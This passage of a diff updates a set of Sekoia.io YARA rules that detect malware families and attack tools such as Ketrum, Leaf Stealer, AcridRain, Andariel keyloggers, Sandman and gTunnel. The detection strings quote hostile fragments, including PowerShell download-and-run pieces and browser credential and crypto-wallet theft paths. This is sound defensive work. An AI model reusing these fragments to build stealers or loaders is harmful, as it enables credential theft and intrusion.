+		description = "Detect Ke3chang's Ketrum backdoor version 2"
 		author = "Sekoia.io"
-		id = "ba3454b4-31cf-458d-8d78-c5cc5fa348ff"
-		date = "2024-05-03"
+		id = "afcc349a-d44b-4b66-b86f-c62e700fa899"
+		date = "2022-10-19"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/crep1x/status/1786150734121120075"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_red0044_powershell_may24.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "73939f65b93b320b9e220ee284ea524864a6b05c7608213009ac5f00b3faeedc"
+		reference = "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_ketrum2.yar#L4-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5317b133337ad333c97bbfa6c9d62aea5fd81f3b570f1d6b1ac93ea82062ef61"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "271384a078f2a2f58e14d7703febae8a28c6e2d7ddb00a3c8d3eead4ea87a0c0"
+		hash2 = "aa467945dd7b9b095e592fc96384bb385f2c95d00d5424e42bb6ab09827cb0ce"
+		hash3 = "aacaf0d4729dd6fda2e452be763d209f92d107ecf24d8a341947c545de9b7311"
+		hash4 = "ac5cb6e17f094068686225075251153e3eb21dc2d1ae744a97ab113cab034a36"
 
 	strings:
-		$str01 = "Start-Job -ScriptBlock" ascii
-		$str02 = "Get-WmiObject" ascii
-		$str03 = "-Class Win32_OperatingSystem" ascii
-		$str04 = "-Class AntiVirusProduct" ascii
-		$str05 = "$_.Exception.Message" ascii
-		$str06 = ".DownloadString" ascii
-		$str07 = "New-Object Net.WebClient" ascii
-		$str08 = "myUserAgentHere" ascii
-		$str09 = "GetFolderPath('Desktop'))\\document.pdf" ascii
-		$str10 = "Receive-Job -Job" ascii
-		$str11 = "Start-Process" ascii
+		$ = "powershell.exe" wide
+		$ = "cmd.exe" wide
+		$ = "%s\\adult.sft" wide
+		$ = "%s\\Notice" wide
+		$ = "%s\\Message" wide
+		$ = "\\Microsoft\\Media Player" wide
+		$ = "Windows\\CurrentVersion\\Explorer\\Shell Folders" wide ascii
+		$ = "Windows\\CurrentVersion\\Internet Settings" wide ascii
 
 	condition:
-		8 of them and filesize < 20KB
+		all of them and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "49a60be4b95b6d30da355a0c124af82b35000bce8f24f957d1c09ead47544a1e" )
 }
-rule SEKOIA_Infostealer_Win_Leaf : FILE
+rule SEKOIA_Apt_Oilrig_Maliciousdocument_May2022 : FILE
 {
 	meta:
-		description = "Find samples of Leaf Stealer based on specific strings"
+		description = "Detects OilRig Malicious Document"
 		author = "Sekoia.io"
-		id = "17d8e384-1092-4f27-b4f7-c0c0f7efcaa3"
-		date = "2023-02-07"
+		id = "cb4ab310-e24c-4edc-8804-0c49c30124fb"
+		date = "2022-05-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_leaf.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f8c0ff694c9f7a02613000d85a40f6b400dcca60711e589f7ccd3546f571aea6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_maliciousdocument_may2022.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d4aa960d4471ddf66ec6f98a5c883177763771ba9960b749509311a05384d9a7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244483,40 +245202,29 @@ rule SEKOIA_Infostealer_Win_Leaf : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Leaf $tealer" ascii
-		$str02 = "KiwiFolder" ascii
-		$str03 = "key_wordsFiles" ascii
-		$str04 = "**[Click to copy](https://superfurrycdn.nl/copy/" ascii
-		$str05 = "Early_Verified_Bot_Developer" ascii
-		$str06 = "getCookie.<locals>.<genexpr>" ascii
-		$str07 = "C:\\Program Files (x86)\\Steam\\config" ascii
-		$str08 = "[crunchyroll](https://crunchyroll.com)" ascii
-		$str09 = "-m pip install" ascii
-		$str10 = "taskkill /im " ascii
-		$str11 = "/loginusers.vdf" ascii
-		$str12 = "mot_de_passe" ascii
-		$str13 = "Interesting files found on user PC" ascii
-		$str14 = "NationsGlory/Local Storage/leveldb" ascii
-		$str15 = "wppassw.txt" ascii
-		$str16 = "wpcook.txt" ascii
-		$str17 = "ProcesName < 1 >" ascii
-		$str18 = "Metamask_" ascii
+		$s1 = "<LogonType>InteractiveToken</LogonType>"
+		$s2 = "Select * From Win32_PingStatus Where Address"
+		$s3 = "She@et1"
+		$s4 = "_VBA_PROJECT" wide
+		$s5 = "This program cannot be run in DOS mode." base64
+		$s6 = ".Agent.pdb" base64
+		$s7 = "GetAgentID" base64
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		uint32be( 0 ) == 0xD0CF11E0 and 3 of them
 }
-rule SEKOIA_Tool_Ssf_Strings : FILE
+rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
 {
 	meta:
-		description = "Detects SSF based on strings"
+		description = "Finds CryptoClippy samples"
 		author = "Sekoia.io"
-		id = "47fc3df8-a153-4045-a5f0-ed30df662984"
-		date = "2024-05-31"
+		id = "eaa98a8e-e29e-43a4-8b2d-2137d33d4116"
+		date = "2023-04-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_ssf_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a6fa09a25c90e00466a2b59f8c604084996224c93021ad72ed8705bf05da5d97"
+		reference = "https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/clipper_win_cryptoclippy.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "057cb5bb957c2338a50c05cfa0177f75bcf263281ddcc5f365298bccafc64cb4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244524,58 +245232,57 @@ rule SEKOIA_Tool_Ssf_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "could NOT read SSF reply"
-		$ = "SSF reply NOT ok {}"
-		$ = "SSF reply OK"
-		$ = "SSF protocol error {}"
-		$ = "SSF reply ok"
-		$ = "SSF version NOT read {}"
-		$ = "SSF version {}"
-		$ = "SSF version NOT supported {}"
+		$str01 = "C:\\mbedtls\\library\\" ascii
+		$str02 = "udp://8.8.8.8:53" ascii
+		$str03 = "Upgrade: websocket" ascii
+		$str04 = "%s\\%s.lnk" ascii
+		$str05 = "%s\\%s.ps1" ascii
+		$str06 = "%s\\%s.bat" ascii
+		$str07 = "set PSExecutionPolicyPreference=Unrestricted" ascii
+		$str08 = "schtasks /delete /tn \"%ls\" /f" ascii
+		$str09 = "SetClipboardData" ascii
+		$str10 = "SetWinEventHook" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 4 of them
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Apt_Apt41_Powershell_Exfiltration_Script : FILE
+rule SEKOIA_Apt_Sidecopy_Cheex : FILE
 {
 	meta:
-		description = "Detects PowerShell exfiltration script"
+		description = "Detects PDB path of Cheex"
 		author = "Sekoia.io"
-		id = "9a15f845-c0af-4f1c-a033-b4f40232dc0d"
-		date = "2023-11-15"
+		id = "e9b57f15-e703-4367-b501-fa8a873e4455"
+		date = "2024-08-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt41_powershell_exfiltration_script.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0ba4118855d6bd54cbb3a35e3b5fc36484eeb1e742ed3480e6c967b078ec4881"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sidecopy_cheex.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "825c7a1603f800ff247c8f3e9a1420af"
+		logic_hash = "e5561466b616c746b33c0c4a46e8bdb0859e55aef8896bc1b14e54838c1661ee"
 		score = 75
-		quality = 72
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$UPLOAD_PASSPORT" ascii wide nocase
-		$ = "$fileName=$singleFile.Name" ascii wide nocase
-		$ = "Upload-Passport" ascii wide nocase
-		$ = "$singleFile in $files" ascii wide nocase
+		$ = "C:\\Users\\Dead Snake\\source\\repos\\cheex" ascii fullword
 
 	condition:
-		filesize < 10KB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Backdoor_Win_Andardoor : FILE
+rule SEKOIA_Apt_Andariel_Keylogger_Strings : FILE
 {
 	meta:
-		description = "Detect the Andardoor backdoor used by Andariel"
+		description = "Detects one of the Andariel keylogger"
 		author = "Sekoia.io"
-		id = "27f28f6e-b8fd-41dc-88a8-92f5a125a807"
-		date = "2023-09-04"
+		id = "59e94bee-9bd4-4f72-9358-858956bb4787"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_andardoor.yar#L4-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "631836634222f4e081d3070c92150a4e14f06bcdd462fbfdf0756aa1f2661b59"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_andariel_keylogger_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "671698af4fbaed3d19f3d3498263183909db9422a5a0a8f12ba119409773c505"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244583,28 +245290,25 @@ rule SEKOIA_Backdoor_Win_Andardoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = " : Deleted Dir" wide
-		$ = " : Not Exists" wide
-		$ = " : Deleted File" wide
-		$ = " : Closed." wide
-		$ = " : Opened." wide
-		$ = "GoodLuck!" wide
+		$ = "Username:%s [%d/%02d/%02d %02d:%02d]" ascii fullword
+		$ = "-------[%d/%02d/%02d %02d:%02d]"
+		$ = "{Insert}"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9fea4972270c492ca304f3663913ae63" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "34fde27c3c864efa6225e72016992d341f29cbbea638432a1c63ce05ca568300" )
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Nosu : FILE
+rule SEKOIA_Tool_Powershell_Unicorn : FILE
 {
 	meta:
-		description = "Finds Nosu samples based on characteristic strings"
+		description = "Detects Unicorn Powershell"
 		author = "Sekoia.io"
-		id = "9823af25-e30b-4514-a59c-02dd19fe368d"
-		date = "2022-12-15"
+		id = "287c1669-2ee1-488e-bf66-a99bfe309c90"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_nosu.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f18db2008aa9175fc423133fd6d5872c5750d011aad73c373505347443d5032c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_powershell_unicorn.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8be79789cf77d4f304d9fef4ad6a2d2ac7686b015fff3301fb3e369f2f06230a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244612,25 +245316,25 @@ rule SEKOIA_Infostealer_Win_Nosu : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\xampp\\htdocs\\nosu\\core\\release\\lilly.pdb" ascii
-		$str1 = "{\"gp\":\"%s\",\"app\":\"%S\"," ascii
-		$str2 = "stored in zip:\\%s" wide
+		$ = ").value.toString() ('JAB" ascii wide
+		$ = ").value.toString());powershell (" ascii wide
+		$ = "powershell /w 1 " ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them and filesize < 1MB
+		all of them and filesize < 100KB
 }
-rule SEKOIA_Koi_Netstealer : FILE
+rule SEKOIA_Backdoor_Sandman_Strings : FILE
 {
 	meta:
-		description = "Detects NET ofbuscated Stealer used loaded by KoiLoader"
+		description = "Detect the Sandman backdoor based on strings"
 		author = "Sekoia.io"
-		id = "deb06e2a-848c-44b3-be95-017ebccf11f8"
-		date = "2024-03-20"
+		id = "7bac7a1e-7d4a-4410-9ad4-1c85beb6faaf"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/koi_netstealer.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "814db1092820ff1ed9e592dc92c72ad73643eb6d68df9f593ed637434373e41b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_sandman_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "74ee1b73532d9050d5ed7ea0bed158322288a2f5b65255804ebf10dc1a4ea55b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244638,80 +245342,56 @@ rule SEKOIA_Koi_Netstealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$name_1 = "pg20"
-		$name_2 = "pg40"
-		$s1 = "Curve25519"
-		$s2 = "ConsoleApp"
-		$s3 = "e0d2eec7-eb14-48ba-8709-dcc9de65947d"
+		$s1 = "e9f7c24c-879d-49f2-b9bf-2477dc28e2ee"
+		$s2 = "System.Net.Sockets"
+		$s3 = "ntpServer"
+		$s4 = "payloadUrl"
+		$s5 = "keepRunning"
+		$s6 = "payloadSize"
+		$s7 = "defaultNtpMessageSize"
+		$s8 = "InjectShellcode"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 150KB and any of ( $name_* ) and all of ( $s* )
+		uint16be( 0 ) == 0x4d5a and 7 of them or $s1
 }
-rule SEKOIA_Infostealer_Win_Acridrain_Mar23 : FILE
+rule SEKOIA_Hacktool_Pplblade_Strings : FILE
 {
 	meta:
-		description = "Finds AcridRain samples"
+		description = "Detects PPLBlade"
 		author = "Sekoia.io"
-		id = "049b502a-0fb6-4fa9-a1ce-f01a40269bdb"
-		date = "2023-03-21"
+		id = "1a443621-fc95-4a70-873e-c1389943d4ab"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_acridrain_mar23.yar#L1-L40"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7fa1822acc6264a3a58fffef3fc572f8818d99037b20d5abb8bfb41f025949d4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_pplblade_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e853e109dbf5dfcba465f61cb689f261df5156e98297d3d00f700e20491de66e"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "\",\"r\":" ascii
-		$str02 = "\",\"s\":\"" ascii
-		$str03 = "\",\"p\":\"" ascii
-		$str04 = "\",\"a\":\"" ascii
-		$str05 = ",\"c\":" ascii
-		$str06 = ",\"g\" :" ascii
-		$str07 = "v7166637466625297979 t2537736810932639330 ath5ee645e0 altpriv cvcv=2 cexpw=1 smf=0" ascii
-		$str08 = "Content-Type: multipart/form-data; boundary=----974767299852498929531610575" ascii
-		$str09 = "\\Roaming\\Bitwarden\\data\\bitwarden.sqlite3" ascii
-		$ste01 = "\\Roaming\\Exodus\\exodus.wallet" ascii
-		$ste02 = "\\Roaming\\Electron Cash\\wallets" ascii
-		$ste03 = "\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb" ascii
-		$ste04 = "\\Local Extension Settings\\" ascii
-		$ste05 = "cnmamaachppnkjgnildpdmkaakejnhae" ascii
-		$ste06 = "ffnbelfdoeiohenkjibnmadjiehjhajb" ascii
-		$ste07 = "\\formhistory.sqlite" ascii
-		$ste08 = "\\logins.json" ascii
-		$ste09 = "encrypted_key" ascii
-		$ste10 = "\\Login Data" ascii
-		$enc01 = "bX5cVw8FKyAKZVxXXUAdSTUXCXdCV0FoOxoSF0ZEUEZS" ascii
-		$enc02 = "bX5cVw8FKywUaVVbRlkyPAQAFCB1U0dV" ascii
-		$enc03 = "bX5cVw8FKzQvUBFhRkYINSIWA3IRdlJADw==" ascii
-		$enc04 = "bX5cVw8FKzYWdUVcWl8iCBU5NXBERl1dBTUiFgNyEXZSQA8=" ascii
-		$enc05 = "bWBcVQMAGQI6UEJbGGgeGxgDD2xUQW9QCw8WEAp0" ascii
+		$ = "shirou/gopsutil/internal/"
+		$ = ".miniDumpWriteDump"
+		$ = ".DRIVER_FULL_PATH"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of ( $str* ) and 7 of ( $ste* ) and 1 of ( $enc* )
+		uint16be( 0 ) == 0x4d5a and filesize > 4MB and filesize < 6MB and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Vbs : FILE
+rule SEKOIA_Apt_Andariel_Nestdoor_Variants_Strings : FILE
 {
 	meta:
-		description = "VBS files used by Kimsuky"
+		description = "Detects Nestdoor based on (weak) strings"
 		author = "Sekoia.io"
-		id = "3f92dbda-2ddb-4fa3-a587-743f65ced9e4"
-		date = "2024-09-23"
+		id = "dcfc48ad-f17b-4224-912b-b01740080fea"
+		date = "2024-06-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_vbs.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "12386be22ca82fce98a83a5a19e632bc"
-		hash = "7b5783d42240651af78ebf7e01b31fe8"
-		hash = "ff7d68e5fb253664ce64c85457b28041"
-		hash = "622358469e5e24114dd0eb03da815576"
-		hash = "edbb2aa40408e2a7936067ace38b445b"
-		hash = "73ed9b012785dc3b3ee33aa52700cfe4"
-		logic_hash = "b4a05a50c8223198082f6f6aa7309cc19b019738fb99e37c6f2140b8ef7cecc9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_andariel_nestdoor_variants_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bc01138d1fc079c2b778175742e121f10cb47f29cc4eb04d38b4f0f5740f05a4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244719,50 +245399,60 @@ rule SEKOIA_Apt_Kimsuky_Vbs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ")):Next:Execute " ascii
-		$ = "=\"\":" ascii
-		$ = "\":for "
+		$v_11 = "Error occurs while reading" wide
+		$v_12 = "{DECIMAL}" wide
+		$v_13 = "lnk_" wide
+		$v_21 = "Cannot connect with your ip and your operating system." wide
+		$v_22 = "del /q /f %1" ascii
+		$v_23 = "/f /tn %2" ascii
 
 	condition:
-		all of them and filesize < 10KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( all of ( $v_1* ) or all of ( $v_2* ) )
 }
-rule SEKOIA_Win_Malware_Agnianestealer : FILE
+rule SEKOIA_Clipper_Win_Atlas_Strings
 {
 	meta:
-		description = "Detect the Agniane stealer using strings"
+		description = "Detects Atlas Clipper"
 		author = "Sekoia.io"
-		id = "704c85b7-8b82-4160-ae1b-fd1054cae8e2"
-		date = "2023-08-10"
+		id = "f08c6af6-c325-4f7d-8686-575b25550d6a"
+		date = "2023-07-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_malware_agnianestealer.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0aa40fcb713ab40711108290e8274d783c1336a2c4c03eba2fcc4a44f2ebe39f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/clipper_win_atlas_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c8ad062b69dfe996a488ee9c79f0e7e0016f57f5b54fc39aeb4e207d2a42aa75"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Agniane.pdb" ascii
-		$s2 = "Agniane.exe" wide ascii
+		$s1 = "C:/Users/box/Desktop/ATLAS/ATLAS/main.go" ascii
+		$s2 = "ATLAS Clipper" ascii
+		$s3 = "Victim: %s" ascii
+		$s4 = "Attacker: %s" ascii
+		$s5 = "Install Path: %s" ascii
+		$s6 = "HWID: %s" ascii
+		$s7 = "Install Date: %s" ascii
+		$s8 = "https://t.me/atlasclipper_channel" ascii
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 3MB and 2 of them
+		all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
+rule SEKOIA_Tool_Inswor_Strings : FILE
 {
 	meta:
-		description = "Detects Remote Shell of Mustang Panda by detecting internal structure intialization"
+		description = "Detects In-Swor based on strings"
 		author = "Sekoia.io"
-		id = "cffdd11e-9700-462e-a965-f9f51db63f0b"
-		date = "2022-12-06"
+		id = "99aaad33-510a-41b9-9022-800588c18d6d"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_windows_remoteshell.yar#L1-L121"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4a72ae1574022d6454e29a6b05a0279f2e774f8218d24a3a866721d958c52e1a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_inswor_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "c393128a143b2a3397100b4a30c75112"
+		logic_hash = "b25072e6a9fa5728c24c91056a221778f5fbc9d8ba7a78a6684cd6755761373e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244770,119 +245460,56 @@ rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        C7 45 ?? 0C 00 00 00
-        8D 4E ??
-        C6 01 03
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        }
-		$chunk_2 = {
-        C7 45 ?? 0C 00 00 00
-        8D 4E ??
-        C6 01 02
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        8B 45 ??
-        83 E8 05
-        50
-        51
-        E8 ?? ?? ?? ??
-        }
-		$chunk_3 = {
-        C7 87 ?? ?? ?? ?? 01 00 00 00
-        8D 4E ??
-        C7 45 ?? 0C 00 00 00
-        C6 01 04
-        8B 87 ?? ?? ?? ??
-        89 41 ??
-        66 8B 87 ?? ?? ?? ??
-        66 89 41 ??
-        8B 45 ??
-        83 E8 05
-        50
-        51
-        E8 ?? ?? ?? ??
-        }
-		$chunk_4 = {
-        83 65 ?? ??
-        EB ??
-        8B 45 ??
-        40
-        89 45 ??
-        8B 45 ??
-        3B 45 ??
-        7D ??
-        8B 45 ??
-        03 45 ??
-        0F B6 08
-        8B 45 ??
-        33 D2
-        6A ??
-        5E
-        F7 F6
-        0F B6 84 15 ?? ?? ?? ??
-        33 C8
-        8B 45 ??
-        03 45 ??
-        88 08
-        EB ??
-        83 65 ?? ??
-        EB ??
-        8B 45 ??
-        40
-        89 45 ??
-        8B 45 ??
-        }
+		$ = "open encrypted file error:" ascii
+		$ = "open config file error:" ascii
+		$ = "payload.ini" ascii
 
 	condition:
-		filesize < 8MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Granitetyphoon_Sword2023_Strings : FILE
+rule SEKOIA_Hacktool_Gtunnel_Strings : FILE
 {
 	meta:
-		description = "Detects Sword2023 malware based on strings"
+		description = "Detects Go gTunnel based on strings"
 		author = "Sekoia.io"
-		id = "417b355f-9eb8-40ae-bc3b-f7f23b5ca63e"
-		date = "2023-05-25"
+		id = "f20a4400-8ae6-4954-b643-0a8847f037f0"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_granitetyphoon_sword2023_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8644547f093295eeac30c9040796329a3e2222c06a942d14899545726c8bed78"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_gtunnel_strings.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "76a67f0487fea7b890863bef06a48f665b611f7659eb374cd83cd4be01b812ab"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "TERM=linux"
-		$ = ";echo"
-		$ = "sh:time out"
-		$ = "sh:read stdout error"
-		$ = "/proc/sys/kernel/random/uuid"
+		$repo = "github.com/hotnops/gTunnel/" ascii fullword
+		$s1 = "common.(*Tunnel).GetControlStream"
+		$s2 = "common.(*Tunnel).handleIngressCtrlMessages"
+		$s3 = "client..inittask"
+		$s4 = "client.file_client_proto_rawDescGZIP."
